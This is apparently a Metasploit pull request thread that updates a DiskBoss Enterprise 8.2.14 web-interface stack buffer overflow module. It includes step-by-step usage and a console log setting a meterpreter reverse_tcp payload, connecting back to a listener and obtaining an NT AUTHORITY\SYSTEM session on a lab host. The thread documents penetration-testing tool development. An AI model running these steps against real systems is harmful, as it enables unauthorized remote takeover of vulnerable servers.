Update DiskBoss Module (EDB 42395)

[jrobles-r7]

Added a new target option for the
DiskBoss Server.

This is an MSF port of https://www.exploit-db.com/exploits/42395/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 8.2.14. The vulnerable application is available for download at https://www.exploit-db.com/apps/7e7d6455ada0833b6bf11167e43977df-diskbossent_setup_v8.2.14.exe.

Verification

• Start DiskBoss Enterprise service
• Start DiskBoss Enterprise client application
• Navigate to Tools > DiskBoss Server Options > Server
• Check Enable Web Server On Port 80 to start the web interface
• Start msfconsole
• Do use exploit/windows/http/diskboss_get_bof
• Do set rhost <target IP>
• Do check
• Verify that the target is vulnerable
• Do set payload windows/meterpreter/reverse_tcp
• Do set lhost <framework system IP>
• Do run
• Verify that the Meterpreter session is opened

[wvu]

I'd reorder to put your name next to Gabor's.

[wvu]

How about rewriting this to use positive logic?

if mytarget == targets[3]
  do_some_stuff
else
  do_some_other_stuff
end

[wvu]

Nix this newline when you refactor.

[wvu]

How about Rex::Arch::X86.jmp(0xffffbf25) and document what the address is?

[pbarry-r7]

I took a note to look this up and add it later, will land for now. Thx!

[pbarry-r7]

Verified fine for me:

$ ./msfconsole -q
msf > use exploit/windows/http/diskboss_get_bof
msf exploit(diskboss_get_bof) > set rhost 10.0.2.10
rhost => 10.0.2.10
msf exploit(diskboss_get_bof) > check
[+] 10.0.2.10:80 The target is vulnerable.
msf exploit(diskboss_get_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(diskboss_get_bof) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(diskboss_get_bof) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskBoss Enterprise v8.2.14
[*] Sending stage (179779 bytes) to 10.0.2.10
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.10:49294) at 2017-12-02 16:19:42 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Looks good and thanks, @jrobles-r7! If you wouldn't mind updating the PR with @wvu-r7's feedback whenever is convenient, I can do one more quick verify and land.

[pbarry-r7]

I went ahead and made the requested review changes, all except updating the comment to reflect info about the address being JMP'd to.

[wvu]

Even better!

[pbarry-r7]

Release Notes

This patch updates the DiskBoss Enterprise buffer overflow exploit module to also work with v8.2.14.